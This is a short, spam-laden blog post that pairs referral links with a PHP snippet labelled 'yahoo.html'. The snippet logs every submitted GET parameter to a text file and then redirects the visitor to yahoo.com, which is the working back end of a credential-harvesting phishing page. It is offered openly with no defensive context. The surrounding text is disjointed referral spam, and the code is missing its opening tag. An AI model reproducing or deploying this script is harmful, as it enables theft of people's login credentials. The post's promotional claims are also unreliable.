to earn paart time or part times job visit this link
http://www.referralduty.com/index.php?invite=51816
http://www.referralduty.com/index.php?invite=51816
a complete blog for any type of computer or laptop problem.either hardware or software
example :yahoo.html
header ('Location: http://yahoo.com');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>